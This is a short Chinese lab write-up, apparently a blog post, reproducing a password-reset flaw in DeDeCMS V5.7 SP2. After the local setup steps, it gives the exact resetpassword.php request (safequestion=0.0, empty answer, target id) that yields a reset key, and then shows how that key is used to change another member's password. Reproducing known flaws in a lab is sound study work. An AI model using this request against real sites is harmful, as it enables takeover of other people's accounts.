目录
一、复现环境
PHP 5.6
DeDeCMSV5.7SP2
正式版
(2018-01-09)
二、复现过程及环境
安装 DeDeCMS
首先,利用PHPstudy安装环境
![](https://img-blog.csdnimg.cn/4d4c2d9c3cd74ede8595d775165dd386.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAaGFuUkZM,size_20,color_FFFFFF,t_70,g_se,x_16)
点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写
回到文件夹,打开
DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可
域名/install/ 进入安装页面
填写好基本信息
进入网站后台,登录管理员账号
![](https://img-blog.csdnimg.cn/c1100be44c0a4a118150a9de31abd301.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAaGFuUkZM,size_20,color_FFFFFF,t_70,g_se,x_16)
在系统设置中开启会员功能
然后退出管理员账号,注册会员账号,并不设置安全问题,可注册多个
用admin可查看我注册的会员账号,我的user1的mid为2
接下来就是抓包啦
首先你得先有一个抓包工具BURPSUITE,点击文件夹最下方的运行薄荷.vbs
![](https://img-blog.csdnimg.cn/14145d2e216d4cdb9fec12425268ed8d.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAaGFuUkZM,size_20,color_FFFFFF,t_70,g_se,x_16)
开始抓包,
域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2(mid是你抓包的用户的mid,比如我的是2 )用burp抓包得到key.
域名/member/resetpassword.php?dopost=getpasswd&id=2
跳转到修改密码页面,临时验证码就是key
然后成功修改密码